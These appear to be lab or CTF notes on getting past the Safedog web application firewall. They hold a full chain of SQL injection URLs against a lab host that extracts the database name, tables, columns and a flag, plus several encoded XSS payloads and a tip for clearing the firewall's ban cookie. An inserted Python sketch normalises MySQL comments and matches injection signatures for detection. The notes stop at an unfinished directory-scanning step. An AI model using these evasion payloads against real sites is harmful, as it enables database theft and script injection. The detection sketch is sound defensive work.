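Tip
If a payload you send gets you banned, Safedog inserts a cookie into your browser's cookies, and every later visit to that page is blocked; deleting that cookie is enough to get past the block.
SQL injection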
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-1--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/order--+/*%0Aby 2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,2--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,/*!10044database*//*!()*//**/--%20--+
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(table_name)/**/%20--+/*%0Afrom%20information_schema.tables%20where%20table_schema=database()%23*/
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(column_name)/**/%20--+/*%0Afrom%20information_schema.columns%20where%20table_name=%27flag%27%23*/
http://10.1.1.18/control/sqlinject/manifest_error.php?id=-1%27/**/union/**//*!10044select*//**/1,group_concat(flag)/**/%20--+/*%0Afrom%20flag%23*/
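
The requests above get through because the filter and MySQL disagree about comments: MySQL treats /**/ as whitespace, runs the body of /*!10044...*/, and ends a "-- " comment at the newline even when it contains "/*". The following added example (not part of the original notes) shows the defender's side: reduce a parameter value to what MySQL would see before applying signatures. The rule names and patterns are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical rule names and patterns, chosen for this example only.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "boolean_probe": re.compile(r"\band\s+-?\d+\s*=\s*-?\d+"),
}

def mysql_view(raw_value: str) -> str:
    """Approximate what MySQL's lexer keeps from a raw parameter value.
    Quote state is not tracked, so comment markers inside string literals
    are stripped too; acceptable for a detection heuristic."""
    s = unquote_plus(raw_value)
    out, i, n = [], 0, len(s)
    while i < n:
        if s.startswith("/*!", i):
            # Executable comment: assume the body runs; drop the version digits.
            end = s.find("*/", i + 3)
            end = n if end < 0 else end
            out.append(re.sub(r"^\d{5,6}", "", s[i + 3:end]))
            i = end + 2
        elif s.startswith("/*", i):
            # Plain block comment: behaves as whitespace.
            end = s.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif s[i] == "#" or (s.startswith("--", i)
                             and (i + 2 == n or s[i + 2].isspace())):
            # Line comment: runs to the newline, even across a "/*".
            end = s.find("\n", i)
            i = n if end < 0 else end + 1
            out.append(" ")
        else:
            out.append(s[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()

def findings(raw_value: str) -> list[str]:
    """Rule names that match the normalised value, in RULES order."""
    text = mysql_view(raw_value)
    return [name for name, rx in RULES.items() if rx.search(text)]

if __name__ == "__main__":
    # id values copied from the requests listed above, plus a constructed benign one.
    for value in ("1'/**/order--+/*%0Aby 2--+",
                  "-1%27/**/union/**//*!10044select*//**/1,2--+",
                  "42"):
        print(findings(value), "<-", value)
```
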
XSS
payload:
<iframe srcdoc%3d"%26lt%3bimg src%26equals%3bx%3ax onerror%26equals%3balert%26lpar%3b1%26rpar%3b%26gt%3b">
<object data%3ddata%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==><%2fobject>
<marquee onstart%3dalert(1)><%2fmarquee>
<body/οnlοad=alert(1)><body>
<a onclick%3dalert(18)>
Directory scanning
A normal scan fails.
Use the 7kbscan tool to scan with a delay: